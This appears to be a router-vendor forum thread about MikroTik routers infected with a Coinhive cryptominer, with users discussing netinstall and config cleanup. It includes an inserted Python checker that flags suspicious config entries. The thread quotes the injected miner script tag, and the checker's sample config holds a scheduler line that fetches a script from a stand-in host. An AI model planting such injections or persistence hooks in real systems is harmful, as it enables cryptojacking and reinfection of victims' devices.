
Router is infected by coinhive virus

Posted: Fri Aug 31, 2018 11:23 am
by underwaterhp93
My router is infected by a virus. It is using a web proxy to create a web error coin miner when I open any website, and it creates an error html file, a script file (to download the html file) and an ftp user, and enables ssh and telnet.
I tried to delete all error.html, mirotik.php and script files, delete all users except admin (changed password), and disable everything except winbox.
I also upgraded to the newest firmware. But after that, it doesn't work, the virus takes it back.
When I look at the log, it attacks through telnet and ssh using the ftp user.
Someone help me please.
Thanks for reading and sorry for my bad English.

Re: Router is infected by coinhive virus

Posted: Fri Aug 31, 2018 11:33 am
by normis
I suggest following all MikroTik related news; this issue was fixed in April already. Please read the instructions here:
https://blog.mikrotik.com/security/winb ... ility.html

Re: Router is infected by coinhive virus

Posted: Sun Oct 07, 2018 11:50 pm
by yalex
This did not help: https://blog.mikrotik.com/security/winb ... ility.html

My (rb1100ahx2) router's OS was 6.43 and I was using the latest Winbox, but all of my web sites on my Windows or Linux web servers randomly show as infected by coinminer.ah malware (<script src="https:// coinhive.com/lib/coinhive.min.js">).
I did all the steps on your blog and updated to v6.44beta14 and still have the problem.
What do you mean by this: "Currently there is no sure way to see if you were affected"?
I guess my router is infected because in the last 24 hrs I was thinking the malware was on my web servers and did not find any problem at all on the servers.
I also exported the config to a file and did not find any SOCKS proxy. Please help to solve this; we have many web sites in our network and customers are very angry about this.

Re: Router is infected by coinhive virus

Posted: Mon Oct 08, 2018 5:46 am
by jspool
If it's ever been hacked or suspected of being hacked then you need to Netinstall the current RouterOS version. Use a packet capture tool and you should be able to narrow down the source if it's not the Mikrotik.

Re: Router is infected by coinhive virus

Posted: Mon Oct 08, 2018 1:04 pm
by R1CH
Updating RouterOS won't magically remove bad parts of your configuration, it only prevents future exploits (assuming you changed your passwords). It's up to you to disinfect the router; the recommended way is to netinstall with a known good config, otherwise export the config, reset to default, then import the sanitized config.
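As an added example (not from this thread, and not MikroTik's own tooling), a small checker for the "export, sanitize, re-import" step described above: it parses a constructed RouterOS export and flags the configuration areas this thread mentions (web proxy and its access rules, SOCKS, scheduler and script entries, telnet/ftp/ssh services). The sample export and the indicator list are assumptions and deliberately not a complete list.

```python
import re
# Constructed sample of a RouterOS "/export" with entries of the kind the thread describes.
SAMPLE_EXPORT = """\
# mar/09/2020 13:00:00 by RouterOS 6.43
/ip proxy
set enabled=yes port=8080
/ip proxy access
add action=deny dst-port=80 redirect-to=0.0.0.0:8080
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=1d name=upd on-event=\\
    "/tool fetch url=http://example.invalid/mirotik.php" start-time=startup
/ip service
set telnet disabled=no
set winbox disabled=no
"""

# Assumed indicator list: (section, regex over the command, why it needs a look).
INDICATORS = [
    ("/ip proxy", r"\benabled=yes\b", "web proxy on: what served the injected miner page"),
    ("/ip proxy access", r"\bredirect-to=", "proxy access rule redirecting clients"),
    ("/ip socks", r"\benabled=yes\b", "SOCKS proxy on"),
    ("/system scheduler", r"^add\b", "scheduler entry: typical re-infection hook"),
    ("/system script", r"^add\b", "stored script"),
    ("/ip service", r"^set (telnet|ftp|ssh)\b.*\bdisabled=no\b", "remote login service on"),
]

def parse_export(text):
    """Return (section, command) pairs; a trailing backslash continues the line."""
    section, buf, out = "", "", []
    for raw in text.splitlines():
        if raw.rstrip().endswith("\\"):       # continuation: keep text, drop the backslash
            buf += raw.rstrip()[:-1]
            continue
        line, buf = (buf + raw.strip()).strip(), ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):              # a bare path opens a new section
            section = line
        else:
            out.append((section, line))
    return out

def find_indicators(text):
    """Return (section, command, reason) for entries to review before re-importing."""
    return [(sec, cmd, why) for sec, cmd in parse_export(text)
            for s, pat, why in INDICATORS if sec == s and re.search(pat, cmd)]

print(*find_indicators(SAMPLE_EXPORT), sep="\n")
```

Every hit is something to remove or justify before the sanitized config goes back onto a freshly netinstalled router; an entry absent from the list is not proof the export is clean.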

Re: Router is infected by coinhive virus

Posted: Mon Mar 09, 2020 1:32 pm
by CZFan
I suggest following all MikroTik related news; this issue was fixed in April already. Please read the instructions here:
https://blog.mikrotik.com/security/winb ... ility.html

@normis,
If I do a netinstall of an infected router, but "keep old configuration" is enabled, and do a factory reset immediately after, will this still resolve the problem?

Re: Router is infected by coinhive virus

Posted: Mon Mar 09, 2020 1:33 pm
by normis
If the old configuration were to contain some script that sets passwords in your router and disables reinstall, it could do this before you run the reset.

Re: Router is infected by coinhive virus

Posted: Mon Mar 09, 2020 2:45 pm
by anav
CZFan, were the instructions ever to keep an old corrupted hacked config in place, EVER? Does it even sound logical, lol? C'mon, having an Alzheimer's moment or something??
It's not like you don't know how scripts work etc... and you know how smart hackers are...
Oh I get it, you may already have the coronavirus...
https://unhappyhourblog.files.wordpress ... 9671_n.jpg

Re: Router is infected by coinhive virus

Posted: Mon Mar 09, 2020 7:21 pm
by CZFan
If the old configuration were to contain some script that sets passwords in your router and disables reinstall, it could do this before you run the reset.
@normis, Thank You, makes sense.

Had a case where I suspected devices had been infected, did a netinstall but never checked if "keep old config" was enabled.

What is also interesting is that AVG detected, from the binary backup files created before the netinstall of this exact device, that it was infected.